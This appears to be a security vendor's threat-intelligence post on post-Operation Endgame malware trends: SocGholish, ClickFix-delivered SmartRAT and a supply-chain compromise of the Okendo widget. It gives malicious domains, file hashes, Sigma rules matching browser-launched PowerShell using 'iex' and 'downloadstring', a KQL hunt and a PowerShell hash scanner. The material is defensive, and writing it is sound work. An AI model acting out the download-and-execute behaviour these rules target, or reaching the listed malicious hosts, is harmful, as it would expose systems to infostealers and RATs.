The latest OTX pulses reveal a significant shift in the threat landscape following the Operation Endgame takedown. While law enforcement successfully disrupted the TA569 (GOLD PRELUDE) SocGholish infrastructure—taking down 106 servers and remediating 15,000 compromised WordPress sites—adversaries are rapidly pivoting to new tactics.
Threat actors are now leveraging AI-generated typosquatting (e.g., impersonating Brazilian banks) to deliver SmartRAT via ClickFix campaigns (fake CAPTCHA/BSOD screens). Concurrently, a supply chain attack targeting the Okendo Reviews widget highlights the risk of trusted third-party JavaScript being weaponized to deliver Remcos and StealC. Despite the disruption of legacy loaders like SocGholish, the ecosystem remains active with LummaC2, Vidar, and AgentTesla continuing to flood the market via cracked software distribution.
Threat Actor / Malware Profile
Adversaries:
- TA569 (GOLD PRELUDE): Historically relied on "Fake Browser Update" prompts via compromised WordPress sites. Infrastructure severely degraded by Operation Endgame.
- SmartApeSG: Active actor utilizing supply chain compromise (Okendo widget) to inject malicious JavaScript loaders.
- Unknown Actor (Brazil Focus): Using AI site builders for typosquatting and ClickFix social engineering.
Key Malware Families:
- SmartRAT: PowerShell-based banking trojan. Uses encrypted C2 and focuses on credential interception.
- StealC / LummaC2 / Vidar: Information stealers targeting browser cookies, credentials, and crypto-wallets. Often distributed via S3 buckets and warez sites.
- SocGholish: JScript-based malware loader (currently disrupted).
Attack Chain:
- Initial Access: Compromised WP sites (SocGholish), Malicious JS Injection (Okendo), or Typosquatting domains (SmartRAT).
- Social Engineering: Fake Browser Updates, Fake CAPTCHA/BSOD (ClickFix).
- Execution: Malicious JScript or PowerShell commands (often obfuscated).
- Payload Delivery: Download of RATs (SmartRAT, Remcos) or Stealers (LummaC2).
- Objective: Credential theft, financial fraud, and establishing foothold for ransomware (e.g., LockBit, WastedLocker).
IOC Analysis
The pulses provide a mix of infrastructure and payload indicators:
- Hostnames/Domains: A large volume of compromised WordPress hostnames (SocGholish) and typosquatted domains (e.g.,
crefisa.online,windowsupdate-cdn.com). These should be blocked immediately at the perimeter. - URLs: Specific malicious endpoints used in the Okendo supply chain attack (
api.wiggettcks.com). These indicate active C2 or loader servers. - File Hashes (MD5/SHA1/SHA256): Multiple hashes associated with SmartRAT, GhostLoader, and various stealers. These are critical for EDR correlation and scanning temp directories.
Operational Guidance: SOC teams should push the hostnames to DNS Firewall/Blokada rules. File hashes should be loaded into EDR isolation policies. The URLs suggest active C2 infrastructure; SSL inspection is required to detect the traffic if IP blocking fails.
Detection Engineering
The following detection logic targets the ClickFix PowerShell execution, the residual SocGholish fake update patterns, and the specific IOCs provided.
title: Potential ClickFix PowerShell Execution via Browser
date: 2026/06/21
status: experimental
description: Detects suspicious PowerShell execution often triggered by ClickFix campaigns (fake BSOD/CAPTCHA) where browser processes launch cmd/ps.
references:
- https://otx.alienvault.com/pulse/627f3a2b8f5c1c4b6e9d1a2c
author: Security Arsenal
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- '\chrome.exe'
- '\msedge.exe'
- '\firefox.exe'
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
CommandLine|contains:
- 'copy'
- 'iex'
- 'downloadstring'
condition: selection
falsepositives:
- Legitimate admin scripts launched from browser downloads
level: high
tags:
- attack.execution
- attack.t1059.001
- clickfix
---
title: SocGholish Fake Browser Update Pattern
date: 2026/06/21
status: experimental
description: Detects file creation patterns associated with SocGholish Fake Browser Updates, often dropped as JS files in common directories.
references:
- https://otx.alienvault.com/pulse/627f3a2b8f5c1c4b6e9d1a2c
author: Security Arsenal
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains:
- '\Downloads\update'
- '\AppData\Local\Temp\update'
TargetFilename|endswith:
- '.js'
- '.jse'
condition: selection
falsepositives:
- Legitimate software update downloads
level: medium
tags:
- attack.initial_access
- attack.t1189
---
title: SmartRAT and Infostealer Hash Detection
date: 2026/06/21
status: experimental
description: Detects specific file hashes observed in the ClickFix and May Infostealer pulses.
references:
- https://otx.alienvault.com/pulse/627f3a2b8f5c1c4b6e9d1a2c
author: Security Arsenal
logsource:
category: file_creation
product: windows
detection:
selection:
Hashes|contains:
- '297eb45f028d44d750297d2f932b9c91'
- '3c72e1f37f115b00c3ad6ed31bacfe8a'
- '6bf4d4c62b5138ace281ce3d08297787'
- 'b17ccdb5531555e43f082d6e77c07227'
- '0d1f6685b4e284f92ef25c0f9358bcdc'
- '46e32500cd24395dd140293758e72fe8671217f5f5b0307858fc118a125aab8c'
condition: selection
level: critical
tags:
- attack.impact
- attack.t1560.001
kql
// Hunt for ClickFix related network connections and domains
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("wiggettcks.com", "wizzleticks.com", "crefisa.online", "windowsupdate-cdn.com")
or DeviceName has_any ("trademark.iglesiaelarca.com", "content.garretttrails.org", "promo.summat10n.org")
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| extend IOCPulse = "ClickFix_SmartRAT_Okendo"
powershell
# IOC Hunt Script for SmartRAT and Infostealer Hashes
$TargetHashes = @(
"297eb45f028d44d750297d2f932b9c91",
"3c72e1f37f115b00c3ad6ed31bacfe8a",
"6bf4d4c62b5138ace281ce3d08297787",
"b17ccdb5531555e43f082d6e77c07227",
"0d1f6685b4e284f92ef25c0f9358bcdc"
)
$SearchPaths = @("C:\Users\", "C:\ProgramData\", "C:\Windows\Temp")
Write-Host "Scanning for Infostealer and SmartRAT IOCs..."
foreach ($Path in $SearchPaths) {
if (Test-Path $Path) {
Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | Where-Object {
!$_.PSIsContainer -and $_.Length -gt 0kb -and $_.Length -lt 5mb
} | ForEach-Object {
$FileHash = (Get-FileHash -Path $_.FullName -Algorithm MD5).Hash.ToLower()
if ($TargetHashes -contains $FileHash) {
Write-Host "[!] MALICIOUS FILE DETECTED: $($_.FullName) | Hash: $FileHash" -ForegroundColor Red
}
}
}
}
Response Priorities
Immediate (0-4 hours):
- Block IOCs: Implement immediate DNS blocking for all listed hostnames and domains (e.g.,
*.windowsupdate-cdn.com,*.wiggettcks.com). - Hunt Execution: Run the PowerShell hunt script on endpoints to check for the presence of the specific MD5 hashes associated with SmartRAT.
24 Hours:
- Credential Audit: Given the prevalence of StealC and LummaC2, initiate forced password resets for privileged accounts and monitor for suspicious login attempts from GeoIPs outside normal business operations.
- Supply Chain Review: Investigate if the Okendo Reviews widget is present in the e-commerce environment. If so, inspect the loaded JavaScript against the provided IOCs.
1 Week:
- Browser Hardening: Deploy GPO policies to restrict unsigned JavaScript execution or warn users about "Fake Browser Update" popups.
- Architecture Review: Assess the reliance on third-party marketing widgets and implement strict Subresource Integrity (SRI) checks where possible.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.